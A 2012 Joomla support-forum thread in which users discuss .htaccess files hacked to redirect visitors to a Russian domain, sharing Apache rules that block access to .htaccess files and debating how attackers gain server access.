leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Sun Apr 01, 2012 5:59 pm

I did some research on the web related to these htaccess-hacks (leaving server security beyond scope of discussion) and at present we do not protect our own htaccess as distributed with the core. My understanding from my exploration is that with either

Code: Select all

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
or

Code: Select all

<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
you are ok since it prevents external access to any file with .hta

Maybe somebody can confirm my findings and if so than it should be added to the next release.

I found this on a Wordpress blog as well as on multiple other sites. I do realize that finding out how and why is important but if we want to assist this needs urgent clarification to get a confirmation so we can add this in next release already. I will post this also to the bug squad

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Sun Apr 01, 2012 6:20 pm

But if someone gained access to the server via exploiting an old version of Joomla or extension or by 'snitching' the ftp details ... then they could soon remove that or replace the redirect ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Sun Apr 01, 2012 7:01 pm

If somebody has access than they can do anything from above root till root or place anything even in the 'home' directory of the sever. Those scenarios are not limited to hta-files

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Sun Apr 01, 2012 7:05 pm

leolam wrote:If somebody has access than they can do anything from above root till root or place anything even in the 'home' directory of the sever. Those scenarios are not limited to hta-files

...
That is not in dispute, my point is that it is not a new hack that is attacking the .htaccess. My point is that it is a script dropped onto the server after gaining access via any of the existing hacks.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Locked

Return to “Security in Joomla! 2.5”